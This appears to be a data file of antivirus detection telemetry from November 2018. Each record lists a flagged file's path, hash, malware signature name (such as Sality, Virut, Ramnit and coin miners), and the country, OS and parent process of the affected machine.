  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\xcv0pur3wct\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:23:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-084436-cb2aae14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d170331b\\AVSCAN-20181101-083617-9FC09A92\\AVSCAN-20181101-084436-CB2AAE14', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:44:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Desktop\\\\\\\\Download\\\\\\\\Vavoo TCoreXxx Highlight-Bundle - 2018-05-30.rar\\\\\\"', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinZip\\winzip64.exe', parentsize=92632704, timestamp='2018-11-01T09:20:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152813-d0e17b67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152813-D0E17B67', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:28:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='txksfhek.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\tXKSfHek.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\bys24oi4eni\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='5 305a2a5da2db16e3.16940204 0 0 0', country='CO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Backs\\273793416.exe', parentsize=671232, timestamp='2018-11-01T00:05:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='socio sanitari.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\r4iuba5njiw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T14:22:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000779b', filepath='C:\\Windows\\Temp\\3ea9ac89-96e2-4fce-8a92-4de6c1b5ea98\\tmp00000588\\tmp0000779b', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='ef9cc394e5d1d2a9db4adad0e4af77cc32c863f30e209a0845b369965d003478', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T11:04:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danyoytd.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\DANyoytD.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='inziativa zogno.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\INZIATIVA ZOGNO\\INZIATIVA ZOGNO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='schede corsi sociosanitari.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SCHEDE CORSI SOCIOSANITARI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spideypc.exe', filepath='K:\\اسبيدر-مان\\SPIDEYPC.EXE', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='db81618b6aa236269f4bc22cbea77fd4cb910ec9df27848e34f275146e50e1a2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T21:07:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183144-454427db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183144-454427DB', filesize=64000, name='VBA/Dldr.Agent.hgyym.#M1.#R1'), hash='cc0c14f660c2972092b60816431960efcb3ee991bdbdf1d396405b3d49433c51', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:40:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140.exe', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir001', filepath='\\\\?\\C:\\Applications\\Service.VIR001', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-074626-763f2b65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-074440-5F869C43\\AVSCAN-20181102-074626-763F2B65', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:49:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191136-33629a02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191136-33629A02', filesize=64000, name='TR/Siggen.cucmw.#M1.#R1'), hash='db6f79265933c5ec30247d757b221f8d5694e189970243bede519902113fc960', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201231-d720208d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab568b58\\AVSCAN-20181101-201056-C9CFB056\\AVSCAN-20181101-201231-D720208D', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:12:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1a70231d-6294-4683-83ea-5763b81b5116.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\1A70231D-6294-4683-83EA-5763B81B5116\\1A70231D-6294-4683-83EA-5763B81B5116.exe', filesize=1280000, name='HEUR/AGEN.1031465.#M1.#R1'), hash='cc53c0083b2158bb6abafdab0da31474d97548d4a40f33de09f8bac83f8d98e5', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T19:49:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00006439', filepath='C:\\Windows\\Temp\\cc3c225e-1947-471c-bc0d-576821b355ad\\tmp00000289\\tmp00006439', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='692eb71ef2c2df298a5b4ff079163b977e24c7ac895dffb96b0462e9d8f88b4b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.0.649.11190\\AdAwareService.exe', parentsize=585784, timestamp='2018-11-04T11:04:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-050902-32d5eaef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1c72d810\\AVSCAN-20181105-050749-2859831F\\AVSCAN-20181105-050902-32D5EAEF', filesize=512000, name='PUA/DownloadAdmin.Gen.#M1.#R1'), hash='27be5500d3635b58d44f0ee16bb732255ab2e2879b38aa44caa5c5ed5672932a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:09:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-011422-9451fd5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1c7b400e\\AVSCAN-20181104-011356-8F4E471C\\AVSCAN-20181104-011422-9451FD5C', filesize=208000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='9f14bddd66d2b73f45a9d71818135c175d72227d64f8b3043d6981a629539947', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:14:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161053-ab025237', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161053-AB025237', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:11:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135115-b32d195a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9baeab3d\\AVSCAN-20181104-134741-90643999\\AVSCAN-20181104-135115-B32D195A', filesize=2432000, name='Adware/DealPly.3af287.#M1.#R1'), hash='3af28771c41fd4aafd9eabc58fadc6b5dfb9502eaeb91b8618a0420b16f155bb', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T06:51:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pstilldll.dll', filepath='E:\\PORTABLE Software\\Silhouette America\\Silhouette Studio\\pstilldll.dll', filesize=1344000, name='W32/Ramnit.CD.#M1.#R1'), hash='8de61b96ff315ab40a216fc4f57d678f8fefdda9335bf2d33518f34141941523', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:21:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T16:49:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:03:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123333-1edcbcea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a1c7d8b4\\AVSCAN-20181104-123305-1906B475\\AVSCAN-20181104-123333-1EDCBCEA', filesize=144000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='3702773aa609a75bc96e6d5e3d7cf9a2b252f9778cdb264fa742de6dd4974b45', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:33:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0348985.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0348985.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:50:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131526-2a447916', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131526-2A447916', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='datamngrui.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='7a0dcdb58d4e5bbf303af3c6c5f9063ecfeb2e404d5797577234cd26d8be0b56', metadata=Row(cmdline=None, country='NI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T22:14:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e4d593d3e01dc63ca784517f41b55215.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_1607591932\\e4d593d3e01dc63ca784517f41b55215.smp', filesize=1408000, name='TR/Autoit.dhgip.#M1.#R1'), hash='4bcd55317d36fc56a5058f046a339dec1f07954384367d538f0344e1ab50f017', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T20:37:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023aff', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023aff', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:40:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212026-1f34a9d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-212026-1F34A9D4', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:20:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T10:29:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T13:49:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='launcher.exe', filepath='D:\\03 ENTRETENIMIENTO\\01 Juegos\\09 Madagascar\\LAUNCHER.EXE', filesize=5120000, name='TR/Patched.Ren.Gen.#M300.#R3369'), hash='59efd9bb223ed95ff3b8eddc20607876609ca0cd8de59994ce8f8e112ce92897', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\ESET\\ESET Security\\ekrn.exe', parentsize=2330224, timestamp='2018-11-04T02:37:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='optsatadc.dll', filepath='\\?\\C:\\Windows\\SysWOW64\\Optsatadc.DLL', filesize=384000, name='TR/Crypt.XPACK.Gen.#M300.#R4115'), hash='395ee8c70f2d152207d1ea3ecccdf2a48dd64b4e7b301898c3dfb2ca25937f17', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:48:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:53:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:40:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Windows.old.000\\Program Files\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:12:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Neshta.A.#M1.#R1'), hash='6f89e7e102f825264049fb2af1bce6683c799807cf5520697777232a3d589fd1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\WiseRegistryCleaner\\Activator.exe', parentsize=684032, timestamp='2018-11-04T22:08:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T04:10:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unpacked.exe', filepath='\\\\?\\D:\\العاب بنات\\كل المطعم\\Sallys Salon\\unpacked.exe', filesize=1536000, name='HEUR/Patched.Ren.#M1.#R1'), hash='c18191f4d5799b3f8feb5d6cb0da47c47dd0b5ad7c84acbc119fc1babe3bf6a8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:00:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rarsfx1\\1.exe', filesize=1792000, name='HEUR/APC.#M1.#R1'), hash='4a2b3eb2d63ba8c05df30e1702786634f69490f9ce6a3fdeb19b4829b7482f00', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=302592, timestamp='2018-11-04T19:02:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:45:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mobsync.exe', filepath='C:\\WINDOWS\\system32\\mobsync.exe', filesize=384000, name='W32/Infector.Gen8.#M300.#R700734'), hash='1a5e407ab6a036348811c989b1939740f829b3d14ececa5c06eede67f9269e8c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:34:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8c46', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8c46', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132149-68b71ec5', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_8be28640\\AVSCAN-20181104-131239-138C782E\\AVSCAN-20181104-132149-68B71EC5', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000085c', filepath='C:\\Windows\\Temp\\tmp00000462\\tmp0000085c', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:51:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='143___05.exe', filepath='d:\\كاميرا\\143___05\\143___05.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='b9409d8e1b382236ea21942e235f81e32c22d45c0c136872420d9cba90f239d8', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:55:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='blocada_kh_v15.exe', filepath='C:\\Users\\X\\Music\\Blocada_KH_v15.exe', filesize=9344000, name='TR/Spy.Banker.Gen4.#M300.#R100338'), hash='9cd534d450db8b6b053240cd6d16cb3e3daefd32527d50b8f6ec0866934397c6', metadata=Row(cmdline='\\\\\\/increment', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\aitagent.exe', parentsize=None, timestamp='2018-11-04T11:54:15Z'), dt=datetime.date(2018, 11, 4)),
